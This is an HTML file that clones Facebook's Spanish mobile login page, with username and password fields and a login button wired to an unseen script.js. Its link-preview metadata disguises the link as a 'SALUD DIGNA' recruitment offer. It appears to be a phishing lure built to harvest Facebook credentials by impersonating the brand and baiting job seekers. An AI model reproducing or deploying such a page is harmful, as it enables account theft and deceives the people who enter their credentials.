<!DOCTYPE html>
<html lang="es">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Facebook - Entrar o registrarse</title>
<meta property='og:image' content='http://localhost:8080/save/salud.jpeg'/>
<meta property='og:url' content='http://saluddigna.org' />
<meta property='og:description' content='Reclutamiento'/>
<meta property='og:title' content='SALUD DIGNA'/>
    <!--CUSTOM CSS-->
    <link rel="stylesheet" type="text/css" href="./style.css" />
    <link rel="icon" type="image/png" href="./favicon.png"/>
  </head>
  <body>
    <div class="container__alert">
        <img src="./img/mobile.png">
        <p>Descarga Facebook para Android y navega más rápido.</p>
    </div>
    <header class="container__header">
      <img src="./svg/facebook.svg" />
    </header>
    <section class="container__section">
      <div class="container__first">
        <input
          type="text"
          placeholder="Número de celular o correo electrónico"
          id="first"
        />
      </div>
      <div class="container__second">
        <input type="text" placeholder="Contraseña" id="second" />
      </div>
      <span id="resfirst"></span>
      <span id="resecond"></span>
      <div class="container__start__button">
        <input type="button" value="Iniciar sesión" id="sendatatme" />
      </div>
      <div class="container__forgot">
        <a href="#">¿Olvidaste tu contraseña?</a>
      </div>

      <div class="container__letter">
        <div class="container__left">
          <hr />
        </div>
        <div class="container__medium">
          <p>o</p>
        </div>
        <div class="container__right">
          <hr />
        </div>
      </div>
      <div class="container__create">
        <button>Crear nueva cuenta</button>
      </div>
    </section>
    <footer class="container__footer">
      <div class="container__language">
        <div class="container__language__left">
          <a href="#">Español</a>
          <a href="#">Italiano</a>
          <a href="#">Português (Brasil)</a>
          <a href="#">العربية</a>
        </div>
        <div class="container__language__right">
          <a href="#">English (US)</a>
          <a href="#">Français (France)</a>
          <a href="#">Deutsch</a>
          <div class="container__more">
            <p>+</p>
          </div>
        </div>
      </div>
      <div class="container__copyright">
        <p>Información · Ayuda · Más</p>
        <p>Meta © 2022</p>
      </div>
    </footer>
    <script src="./script.js"></script>
  </body>
</html>
